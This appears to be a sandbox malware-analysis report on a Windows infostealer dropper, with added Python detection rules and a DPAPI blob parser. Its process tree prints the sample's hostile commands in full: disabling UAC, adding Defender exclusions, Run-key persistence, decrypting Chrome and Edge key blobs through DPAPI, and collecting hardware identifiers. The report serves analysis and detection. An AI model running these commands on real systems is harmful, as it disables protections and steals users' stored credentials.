Analysis

  • max time kernel
    135s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    04/11/2024, 02:47

General

  • Target

    b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe

  • Size

    37.2MB

  • MD5

    a92c1499dbcfff3bc5b57853f6219eec

  • SHA1

    b04810bcad458b6771d4f8430033a6e608a1324b

  • SHA256

    b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2

  • SHA512

    3d762d9b27c74a040ecbd413e48088429855ef0cdd3c11605339f880220a76f6725fcd47c6c0ecb85f63688c6cc20bf5a37b54568155fda84c5c1f4d46b1af3e

  • SSDEEP

    393216:RQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mg396l+ZArYsFRlrN2:R3on1HvSzxAMN3FZArYs+PvAX7OZ0i

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Runs commands through powershell.exe.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Drops file in Windows directory 12 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
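
The signatures above are keyed off a handful of command lines recorded in the Processes section: reg.exe setting EnableLUA to 0 under HKLM\...\Policies\System (this turns UAC prompts off from the next reboot rather than bypassing them, and the HKLM write only succeeds from an already elevated process), Add-MpPreference -ExclusionPath for the sample's staging directory and for C:\Windows\System32\Tasks (also elevated-only), a HKCU Run key pointing at C:\ProgramData\Update.vbs, two ProtectedData::Unprotect calls, tasklist, and a run of WMIC and getmac queries for disk, baseboard and RAM serials, the CPU ID, the system UUID, MAC addresses and the video controller. As an added example, not part of this report or of the sample, the following Python rule set runs detection logic over command lines copied from that tree; the regexes, rule names and ATT&CK IDs are my own mapping, and the DPAPI byte array in the sample input is cut after its 20-byte header (the full array is in the Processes section):

```python
"""Triage rules for sandbox process command lines.

Added example, not the sandbox's own signature logic: the regexes and the
ATT&CK IDs are my mapping of the techniques named in the Signatures section.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    attack_id: str             # my ATT&CK mapping, not the report's
    pattern: re.Pattern
    needs_admin: bool = False  # effect only happens from an elevated process


RULES: tuple[Rule, ...] = (
    # EnableLUA=0 under HKLM\...\Policies\System turns UAC prompts off from
    # the next reboot; the write fails with access denied unless elevated.
    Rule("UAC prompts disabled (EnableLUA=0)", "T1548.002",
         re.compile(r"\breg(?:\.exe)?\s+add\b.*\\Policies\\System\b.*\bEnableLUA\b.*/d\s+0\b", re.I),
         needs_admin=True),
    # Defender exclusions also need admin. The sample excludes its staging
    # directory and C:\Windows\System32\Tasks.
    Rule("Defender path exclusion added", "T1562.001",
         re.compile(r"\bAdd-MpPreference\b.*-ExclusionPath\b", re.I),
         needs_admin=True),
    Rule("Run-key persistence", "T1547.001",
         re.compile(r"\breg(?:\.exe)?\s+add\b.*\\CurrentVersion\\Run\b", re.I)),
    Rule("DPAPI blob decrypted on the command line", "T1555.003",
         re.compile(r"ProtectedData\]::Unprotect\(", re.I)),
    Rule("PowerShell with -ExecutionPolicy Bypass", "T1059.001",
         re.compile(r"\bpowershell(?:\.exe)?\b.*-ExecutionPolicy\s+Bypass\b", re.I)),
    # Disk/baseboard/RAM serials, CPU ID, system UUID, MACs and the video
    # controller: the usual inputs for a victim ID and for VM detection.
    Rule("Hardware identifiers collected (WMIC/getmac)", "T1082",
         re.compile(r"(?:\bwmic\b.*\b(?:serialnumber|uuid|processorid|Win32_VideoController)\b|\bgetmac\b)", re.I)),
    Rule("Process listing via tasklist", "T1057",
         re.compile(r"\btasklist\b", re.I)),
)

# Sample input: (PID, command line) pairs copied from the Processes section
# of this report. The DPAPI byte array is cut after its 20-byte header.
SAMPLE_EVENTS = (
    (1684, r'powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\ChedmB0hfd.ps1"'),
    (3928, "tasklist"),
    (4584, "powershell.exe Add-Type -AssemblyName System.Security; "
           "[System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@("
           "1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235), $null, 'CurrentUser')"),
    (4044, r'reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f'),
    (3456, "wmic diskdrive get serialnumber"),
    (4624, r'reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2 /t REG_SZ /d "C:\ProgramData\Update.vbs" /f'),
    (2004, r'powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.zLX4xIQdwn"'),
    (3876, "wmic PATH Win32_VideoController GET Description,PNPDeviceID"),
    (3512, "getmac /NH"),
    (2384, r'C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"'),
)


def match_rules(cmdline: str) -> list[Rule]:
    """All rules whose pattern matches one process command line."""
    return [rule for rule in RULES if rule.pattern.search(cmdline)]


def triage(events) -> dict[int, list[str]]:
    """Map PID -> names of the rules its command line hit; quiet PIDs are dropped."""
    hits: dict[int, list[str]] = {}
    for pid, cmdline in events:
        names = [rule.name for rule in match_rules(cmdline)]
        if names:
            hits[pid] = names
    return hits


def techniques(events) -> set[str]:
    """Distinct ATT&CK IDs seen across all events."""
    return {rule.attack_id for _, cmdline in events for rule in match_rules(cmdline)}


def pids_needing_elevation(events) -> set[int]:
    """PIDs whose action only takes effect from an elevated process. If they
    succeeded, the sample already ran as an administrator (the sandbox user is
    'Admin'); if not, reg.exe and Add-MpPreference failed with access denied
    and UAC and Defender are untouched."""
    return {pid for pid, cmdline in events
            if any(rule.needs_admin for rule in match_rules(cmdline))}


if __name__ == "__main__":
    for pid, names in triage(SAMPLE_EVENTS).items():
        print(f"PID {pid}: {', '.join(names)}")
    print("techniques:", sorted(techniques(SAMPLE_EVENTS)))
    print("needs elevation:", sorted(pids_needing_elevation(SAMPLE_EVENTS)))
```

The pip install lines deliberately hit nothing: on their own they are not malicious, and the interesting fact about them (a silently installed Python 3.12 plus pillow and pyperclip, i.e. screenshot and clipboard libraries, fetched by a 37 MB dropper) only emerges from the process tree as a whole. The needs_admin flag is the check worth keeping: whether the EnableLUA and Defender-exclusion writes actually landed decides whether a host that ran this sample needs a UAC and Defender policy reset, not just the Run key removed.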

Processes

  • C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe
    "C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:1820
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\ChedmB0hfd.ps1""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:212
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\ChedmB0hfd.ps1"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1684
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\obnw3idv\obnw3idv.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2412
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA875.tmp" "c:\Users\Admin\AppData\Local\Temp\obnw3idv\CSC7D50F6DD4FEB43E28B3E933ADDF3E253.TMP"
            5⤵
              PID:3940
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "tasklist"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4536
        • C:\Windows\system32\tasklist.exe
          tasklist
          3⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3928
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "tasklist"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2032
        • C:\Windows\system32\tasklist.exe
          tasklist
          3⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4240
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,92,105,220,243,63,48,77,130,150,78,48,139,61,164,173,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,81,43,120,173,241,247,62,115,26,136,95,252,103,11,132,114,190,190,236,97,57,213,81,7,219,254,212,140,153,114,132,65,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,191,202,27,33,60,112,20,124,4,172,111,137,104,247,111,169,44,144,39,215,28,99,226,21,45,145,91,23,42,132,214,9,48,0,0,0,222,121,14,212,158,118,82,21,27,54,118,232,74,33,110,201,191,134,42,137,219,248,209,115,30,61,144,45,227,245,250,166,44,11,103,211,78,55,52,202,11,104,70,47,212,30,205,30,64,0,0,0,92,46,67,123,247,132,92,200,31,226,34,205,177,30,50,57,212,80,164,244,47,191,207,122,237,107,18,66,181,203,180,63,77,74,125,114,98,125,253,154,41,130,139,221,42,37,230,246,163,60,184,30,12,50,172,221,96,61,156,45,247,149,3,64), $null, 'CurrentUser')"
        2⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:3168
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,92,105,220,243,63,48,77,130,150,78,48,139,61,164,173,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,81,43,120,173,241,247,62,115,26,136,95,252,103,11,132,114,190,190,236,97,57,213,81,7,219,254,212,140,153,114,132,65,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,191,202,27,33,60,112,20,124,4,172,111,137,104,247,111,169,44,144,39,215,28,99,226,21,45,145,91,23,42,132,214,9,48,0,0,0,222,121,14,212,158,118,82,21,27,54,118,232,74,33,110,201,191,134,42,137,219,248,209,115,30,61,144,45,227,245,250,166,44,11,103,211,78,55,52,202,11,104,70,47,212,30,205,30,64,0,0,0,92,46,67,123,247,132,92,200,31,226,34,205,177,30,50,57,212,80,164,244,47,191,207,122,237,107,18,66,181,203,180,63,77,74,125,114,98,125,253,154,41,130,139,221,42,37,230,246,163,60,184,30,12,50,172,221,96,61,156,45,247,149,3,64), $null, 'CurrentUser')
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4584
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,92,105,220,243,63,48,77,130,150,78,48,139,61,164,173,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,81,56,253,93,39,18,236,19,234,240,34,4,142,243,213,223,117,77,6,121,224,83,100,46,45,50,133,104,79,190,29,127,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,204,39,144,19,170,227,77,14,216,13,225,106,33,15,140,131,35,169,79,164,221,66,93,182,232,16,150,190,81,134,4,6,48,0,0,0,121,226,12,223,234,112,153,115,34,106,114,48,0,198,48,143,164,45,11,153,192,242,19,76,56,189,187,71,3,33,216,123,30,204,207,147,94,245,224,222,166,92,75,156,123,48,34,48,64,0,0,0,18,246,192,99,212,252,220,210,53,28,177,171,228,191,142,171,93,232,9,132,169,155,144,195,114,116,194,80,143,119,95,253,159,220,45,62,173,148,47,75,164,107,231,166,65,4,34,221,229,128,213,39,206,107,58,6,252,115,163,220,28,249,95,152), $null, 'CurrentUser')"
        2⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:4980
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,92,105,220,243,63,48,77,130,150,78,48,139,61,164,173,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,81,56,253,93,39,18,236,19,234,240,34,4,142,243,213,223,117,77,6,121,224,83,100,46,45,50,133,104,79,190,29,127,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,204,39,144,19,170,227,77,14,216,13,225,106,33,15,140,131,35,169,79,164,221,66,93,182,232,16,150,190,81,134,4,6,48,0,0,0,121,226,12,223,234,112,153,115,34,106,114,48,0,198,48,143,164,45,11,153,192,242,19,76,56,189,187,71,3,33,216,123,30,204,207,147,94,245,224,222,166,92,75,156,123,48,34,48,64,0,0,0,18,246,192,99,212,252,220,210,53,28,177,171,228,191,142,171,93,232,9,132,169,155,144,195,114,116,194,80,143,119,95,253,159,220,45,62,173,148,47,75,164,107,231,166,65,4,34,221,229,128,213,39,206,107,58,6,252,115,163,220,28,249,95,152), $null, 'CurrentUser')
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1580
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1544
        • C:\Windows\system32\reg.exe
          reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
          3⤵
          • UAC bypass
          PID:4044
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2268
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic diskdrive get serialnumber
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3456
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2 /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2620
        • C:\Windows\system32\reg.exe
          reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2 /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
          3⤵
          • Adds Run key to start application
          PID:4624
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.zLX4xIQdwn""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4960
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.zLX4xIQdwn"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2004
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4956
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2708
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2684
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic baseboard get serialnumber
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2700
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
      2⤵
      PID:2384
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:916
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic path win32_computersystemproduct get uuid
        3⤵
        PID:1860
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1684
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic PATH Win32_VideoController GET Description,PNPDeviceID
        3⤵
        PID:3876
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4564
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic memorychip get serialnumber
        3⤵
        PID:516
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
      2⤵
      PID:3652
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic csproduct get uuid
        3⤵
        PID:4700
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
      2⤵
      PID:1216
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic cpu get processorid
        3⤵
        PID:2024
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
      2⤵
      PID:856
      • C:\Windows\system32\getmac.exe
        getmac /NH
        3⤵
        PID:3512
    • C:\Users\Admin\AppData\Local\Temp\python-installer.exe
      C:\Users\Admin\AppData\Local\Temp\python-installer.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:568
      • C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe
        "C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\python-installer.exe" -burn.filehandle.attached=544 -burn.filehandle.self=556 /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        PID:1540
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "pip install pyperclip"
      2⤵
      PID:4172
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    PID:4492
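
Both ProtectedData::Unprotect calls in the tree (PIDs 4584 and 1580) hand a DPAPI blob to the victim's own DPAPI in the 'CurrentUser' scope instead of shipping the blob home, because a DPAPI blob is only decryptable with the master key of the account that protected it. As an added example, not from the report or the sample, the following Python parser walks the public CryptProtectData blob layout over the first of those byte arrays (copied verbatim from the PID 4584 command line) and reports what an analyst wants to know without decrypting anything: the provider GUID that identifies a DPAPI blob, the master-key GUID the decryption would need, the description string the protecting application set (it decodes to "Google Chrome" here; the PID 1580 array, which has the same layout, decodes to "Edge"), and the algorithms. The function and constant names (parse_dpapi_blob, unprotect_arg_bytes, CHROME_BLOB, SAMPLE_CMDLINE) are mine.

```python
"""DPAPI blob header parser (added example, not from the report or the sample).

Decodes the byte array the sample hands to ProtectedData::Unprotect so an
analyst can see what is being decrypted without any key material. The field
layout is the CryptProtectData blob format; names below are mine.
"""
import re
import struct
import uuid
from dataclasses import dataclass

DPAPI_PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
ALG_NAMES = {0x6603: "CALG_3DES", 0x660E: "CALG_AES_128", 0x6610: "CALG_AES_256",
             0x8004: "CALG_SHA1", 0x800E: "CALG_SHA_512"}


@dataclass(frozen=True)
class DpapiBlob:
    master_key: uuid.UUID  # file name under %APPDATA%\Microsoft\Protect\<SID>\
    flags: int
    description: str       # set by the application that called CryptProtectData
    crypt_alg: str
    hash_alg: str
    salt: bytes
    data_len: int          # ciphertext length
    sign_len: int          # HMAC length


def parse_dpapi_blob(buf: bytes) -> DpapiBlob:
    """Walk the blob structure; raise ValueError if it is not a DPAPI blob."""
    off = 0

    def take(n: int) -> bytes:
        nonlocal off
        if off + n > len(buf):
            raise ValueError("truncated blob")
        off += n
        return bytes(buf[off - n:off])

    def u32() -> int:
        return struct.unpack("<I", take(4))[0]

    version, provider = u32(), uuid.UUID(bytes_le=take(16))
    if version != 1 or provider != DPAPI_PROVIDER:
        raise ValueError("not a CryptProtectData blob")
    u32()                                    # master key version (always 1)
    master_key = uuid.UUID(bytes_le=take(16))
    flags = u32()
    description = take(u32()).decode("utf-16-le").rstrip("\x00")
    crypt_alg, _key_bits = u32(), u32()      # CALG_*, key length in bits
    salt = take(u32())
    take(u32())                              # HMAC key (normally empty)
    hash_alg, _hash_bits = u32(), u32()      # CALG_*, hash length in bits
    take(u32())                              # second HMAC key
    data_len = len(take(u32()))              # ciphertext
    sign_len = len(take(u32()))              # HMAC over the blob
    if off != len(buf):
        raise ValueError(f"{len(buf) - off} trailing bytes after the signature")
    return DpapiBlob(master_key, flags, description,
                     ALG_NAMES.get(crypt_alg, hex(crypt_alg)),
                     ALG_NAMES.get(hash_alg, hex(hash_alg)),
                     salt, data_len, sign_len)


def unprotect_arg_bytes(cmdline: str) -> bytes:
    """Pull the [byte[]]@(...) literal out of a PowerShell Unprotect() call."""
    m = re.search(r"Unprotect\(\[byte\[\]\]@\(([\d,\s]+)\)", cmdline)
    if not m:
        raise ValueError("no Unprotect([byte[]]@(...)) call in command line")
    return bytes(int(v) for v in m.group(1).split(","))


# The first byte array from the Processes section (PID 4584), copied verbatim.
CHROME_BLOB = bytes([
    1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,
    79,194,151,235,1,0,0,0,100,92,105,220,243,63,48,77,
    130,150,78,48,139,61,164,173,16,0,0,0,28,0,0,0,
    71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,
    104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,
    0,1,0,0,32,0,0,0,81,43,120,173,241,247,62,115,
    26,136,95,252,103,11,132,114,190,190,236,97,57,213,81,7,
    219,254,212,140,153,114,132,65,0,0,0,0,14,128,0,0,
    0,2,0,0,32,0,0,0,191,202,27,33,60,112,20,124,
    4,172,111,137,104,247,111,169,44,144,39,215,28,99,226,21,
    45,145,91,23,42,132,214,9,48,0,0,0,222,121,14,212,
    158,118,82,21,27,54,118,232,74,33,110,201,191,134,42,137,
    219,248,209,115,30,61,144,45,227,245,250,166,44,11,103,211,
    78,55,52,202,11,104,70,47,212,30,205,30,64,0,0,0,
    92,46,67,123,247,132,92,200,31,226,34,205,177,30,50,57,
    212,80,164,244,47,191,207,122,237,107,18,66,181,203,180,63,
    77,74,125,114,98,125,253,154,41,130,139,221,42,37,230,246,
    163,60,184,30,12,50,172,221,96,61,156,45,247,149,3,64,
])

# The PID 4584 command line rebuilt around that array, as the sandbox logged it.
SAMPLE_CMDLINE = ("powershell.exe Add-Type -AssemblyName System.Security; "
                  "[System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@("
                  + ",".join(map(str, CHROME_BLOB)) + "), $null, 'CurrentUser')")

if __name__ == "__main__":
    blob = parse_dpapi_blob(unprotect_arg_bytes(SAMPLE_CMDLINE))
    print(f"{blob.description!r} master key {blob.master_key} "
          f"{blob.crypt_alg}/{blob.hash_alg} ciphertext {blob.data_len} B")
```

The master-key GUID is the name of the file under %APPDATA%\Microsoft\Protect\<SID>\ that DPAPI needs to unwrap the blob, which is why the blob is useless to the attacker off-host and the sample spends a PowerShell process per blob on the victim. The 48-byte ciphertext is the size a 32-byte key becomes under AES-CBC with PKCS#7 padding, consistent with a browser master key wrapped by DPAPI, although the parser itself makes no assumption about the plaintext. A detection that keys on the provider GUID bytes (208,140,157,223,1,21,209,17,...) appearing inside a command line is more robust than matching the Unprotect method name, since the blob has to be carried verbatim no matter how the call is spelled.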

Network

MITRE ATT&CK Enterprise v15

Downloads

                                • C:\Config.Msi\e57de3d.rbs

                                  Filesize

                                  8KB

                                  MD5

                                  48a46d6b43040711c0339edd00fc86a5

                                  SHA1

                                  f9216314a251fa6d35004b4c4092fd533259f0ee

                                  SHA256

                                  4241d8b5549ca50e0072e81c527f094f37f3e7f467654fe73d794b20c12e9fb4

                                  SHA512

                                  4d84d96dfa0f365ef905c519301110428d162d43c0b0dabfe3525c44f2a4f516dbc267070957ce6bbda441b5e33aa75f97c864a1dda097fd533d5916d0f680b5

                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                  Filesize

                                  2KB

                                  MD5

                                  2f57fde6b33e89a63cf0dfdd6e60a351

                                  SHA1

                                  445bf1b07223a04f8a159581a3d37d630273010f

                                  SHA256

                                  3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                  SHA512

                                  42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  1KB

                                  MD5

                                  e89c193840c8fb53fc3de104b1c4b092

                                  SHA1

                                  8b41b6a392780e48cc33e673cf4412080c42981e

                                  SHA256

                                  920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c

                                  SHA512

                                  865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  1KB

                                  MD5

                                  e86a2f4d6dec82df96431112380a87e6

                                  SHA1

                                  2dc61fae82770528bee4fe5733a8ac3396012e79

                                  SHA256

                                  dde11341854008e550d48a18f4880f7e462f5a75f0a6f8c09cf7b0761a425f3a

                                  SHA512

                                  5f127e7c81c480ad134eacfda3f5de738902b879fd4e85ddc663c050c6db748ac3f9d228ca26ddb37df06039df6741d2b774c0201388edf332fe063c464397a5

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  1KB

                                  MD5

                                  7bde4b527f6c280b58f471b90da7fac8

                                  SHA1

                                  d5b685a260a01dd33f8732c8cbc976b2989f6188

                                  SHA256

                                  38ad355760e10eabaa9a9f00436975e1c1e1323e383412abdb108f2980cc7911

